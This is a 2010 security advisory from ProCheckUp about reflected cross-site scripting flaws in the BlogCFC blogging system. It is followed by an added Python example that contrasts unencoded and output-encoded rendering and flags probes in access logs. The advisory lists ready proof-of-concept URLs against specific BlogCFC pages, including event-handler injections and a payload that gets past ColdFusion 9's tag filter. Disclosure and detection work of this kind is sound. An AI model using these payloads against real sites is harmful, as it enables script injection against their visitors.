Date: Tue, 14 Dec 2010 17:40:42 +0000
From: research <research@...checkup.com>
To: "vuln@...unia.com" <vuln@...unia.com>,
	"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"news@...uriteam.com" <news@...uriteam.com>,
	"submit@...sec" <submit@...sec.lists.grok.org.uk>
Subject: PR10-10 Various Cross-Site Scripting Vulnerabilities (XSS) within BlogCFC

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-10



PR10-10 Various XSS within BlogCFC



* Advisory publicly released: Tuesday, 14 December 2010
* Vulnerability found: Sunday, 2 May 2010
* Vendor informed: Monday, 3 May 2010
* Vulnerability fixed: Wednesday, 19 May 2010
* Severity level: Medium

* Credits
Richard Brain of ProCheckUp Ltd (http://www.procheckup.com)

* Description
BlogCFC is a ColdFusion-based blogging system. ProCheckUp has discovered that various BlogCFC programs are vulnerable to generic reflected cross-site scripting (XSS) attacks.



Note: BlogCFC was tested on a fully patched Windows XP machine; ColdFusion 8 (unpatched) and SQL 2005 were used as the application server and the backend database.



Note: ColdFusion 9 includes an application firewall that replaces any <script> tag. To circumvent this, the
      <script>alert(1)</script> payload needs to be substituted with a tag not on the match list, such as </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")> (this works on IE7 and IE6).

      BlogCFC versions tested
      5.9.6.001

    * Proof of concept
      Unauthenticated vanilla XSS. IE7 (Internet Explorer) browser used.

      http://target-domain.foo/tags/podlayout.cfm?ATTRIBUTES.TITLE=<script>alert(1)</script>&thistag.EXECUTIONMODE=start

      http://target-domain.foo/tags/textarea.cfm?attributes.class="></textarea><script>alert(1)</script>&attributes.fieldname=Procheckup&attributes.style=1&attributes.value=1&

      http://target-domain.foo/includes/pods/subscribe.cfm?errorMessage="><script>alert(1)</script>

      http://target-domain.foo/index.cfm?errorMessage="><script>alert(1)</script>

      The following works because the error page does not sufficiently filter tags on unpatched ColdFusion 8
      http://target-domain.foo/stats.cfm?dur='</XSS STYLE=xss:expression(location='http://www.procheckup.com')>



      For the following examples, the mouse has to be moved over the subscribe input box

      http://target-domain.foo/includes/pods/subscribe.cfm?"onmouseover="alert(1);

      http://target-domain.foo/index.cfm?"onmouseover="alert(1);

      http://target-domain.foo/search.cfm?"onmouseover="alert(1);

      http://target-domain.foo/stats.cfm?"onmouseover="alert(1);

      http://target-domain.foo/statsbyyear.cfm?"onmouseover="alert(1);

      http://target-domain.foo/tags/getpods.cfm?"onmouseover="alert(1);
    * How to fix
      Apply the latest patched version.
    * References

    * Legal
      Copyright 2010 Procheckup Ltd. All rights reserved.

      Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

      Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.

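The proof-of-concept URLs above exercise two HTML contexts (element content and a quoted attribute value), and the "How to fix" item only says to apply the patched version. As an added example, not code from the advisory or from BlogCFC, the Python below shows the defender's side of both: the vulnerable rendering beside an output-encoded one, checked against the advisory's own payloads, and a triage routine that flags probes against the affected BlogCFC paths in access-log lines. The page fragments and log lines are constructed for this example; `html.escape()` stands in for whatever HTML output-encoding function the application's own language provides (in CFML, a function such as HTMLEditFormat()).

```python
"""Added example (not part of the ProCheckUp advisory or of BlogCFC).

1. Output encoding: html.escape() with quote=True neutralises both the
   element-content and the attribute-value payloads, and unlike the
   ColdFusion 9 tag blocklist mentioned in the advisory it cannot be
   bypassed by a tag name that is missing from a match list.
2. Log triage: flag requests to the affected paths whose query string,
   once percent-decoded, carries a tag or an event-handler attribute.
Templates and log lines below are constructed for this example.
"""
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Paths named in the advisory's proof of concept.
AFFECTED_PATHS = {
    "/tags/podlayout.cfm", "/tags/textarea.cfm", "/includes/pods/subscribe.cfm",
    "/index.cfm", "/stats.cfm", "/search.cfm", "/statsbyyear.cfm", "/tags/getpods.cfm",
}

# Constructed page fragments standing in for the two injection contexts.
ELEMENT_TEMPLATE = '<p class="error">{value}</p>'
ATTRIBUTE_TEMPLATE = '<input type="text" name="email" value="{value}">'

# Start of any tag, and any on*= event-handler attribute (a closing quote is
# enough to start a new attribute, so whitespace before it is not required).
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")
EVENT_ATTR_RE = re.compile(r"""(?:^|[\s"'])on[a-z]+\s*=""", re.IGNORECASE)

# Payloads exactly as given in the advisory, paired with the context they target.
CASES = [
    (ELEMENT_TEMPLATE, "<script>alert(1)</script>"),
    (ELEMENT_TEMPLATE,
     '</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/")>'),
    (ATTRIBUTE_TEMPLATE, '"><script>alert(1)</script>'),
    (ATTRIBUTE_TEMPLATE, '"onmouseover="alert(1);'),
]


def render_vulnerable(template, value):
    """'Before': the untrusted value is dropped straight into the page."""
    return template.replace("{value}", value)


def render_encoded(template, value):
    """'After': & < > " ' become entities, so the value can neither open a
    tag nor terminate the attribute it sits in."""
    return template.replace("{value}", html.escape(value, quote=True))


def injected_markup(rendered, template):
    """Tags and event handlers present in the rendered page that the template
    itself did not contain; 0 means the payload was neutralised."""
    extra_tags = len(TAG_RE.findall(rendered)) - len(TAG_RE.findall(template))
    extra_handlers = len(EVENT_ATTR_RE.findall(rendered)) - len(EVENT_ATTR_RE.findall(template))
    return extra_tags + extra_handlers


def audit_payloads():
    """(payload, markup injected before encoding, markup injected after encoding)."""
    return [
        (value,
         injected_markup(render_vulnerable(template, value), template),
         injected_markup(render_encoded(template, value), template))
        for template, value in CASES
    ]


REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed Common Log Format lines; two carry probes from the advisory.
LOG_LINES = [
    '10.0.0.5 - - [14/Dec/2010:17:40:42 +0000] "GET /index.cfm HTTP/1.1" 200 5120',
    '10.0.0.7 - - [14/Dec/2010:17:41:03 +0000] "GET /index.cfm?errorMessage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5180',
    '10.0.0.7 - - [14/Dec/2010:17:41:09 +0000] "GET /search.cfm?%22onmouseover=%22alert(1); HTTP/1.1" 200 4090',
    '10.0.0.9 - - [14/Dec/2010:17:42:00 +0000] "GET /stats.cfm?dur=week HTTP/1.1" 200 3010',
]


def triage_access_log(lines):
    """Return (client, path, decoded query) for requests that look like XSS
    probes against the affected paths.  The whole query string is decoded
    rather than parsed into key=value pairs, because several of the advisory's
    URLs put the payload in the parameter name rather than its value."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path not in AFFECTED_PATHS:
            continue
        decoded = unquote_plus(target.query)
        if TAG_RE.search(decoded) or EVENT_ATTR_RE.search(decoded):
            hits.append((line.split()[0], target.path, decoded))
    return hits


if __name__ == "__main__":
    for value, before, after in audit_payloads():
        print(f"injected markup {before} -> {after} for {value!r}")
    for client, path, query in triage_access_log(LOG_LINES):
        print(f"probe from {client} to {path}: {query}")
```

Encoding at the point of output is the durable fix because it is tied to the HTML context rather than to a list of tag names; the second payload in `CASES` is the advisory's own blocklist bypass and is rendered inert by the same `html.escape()` call. Decoding the raw query string in the triage routine matters for the same reason the advisory's `?"onmouseover="alert(1);` URLs work: the injected text is the parameter name, which a key/value parser would silently discard.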
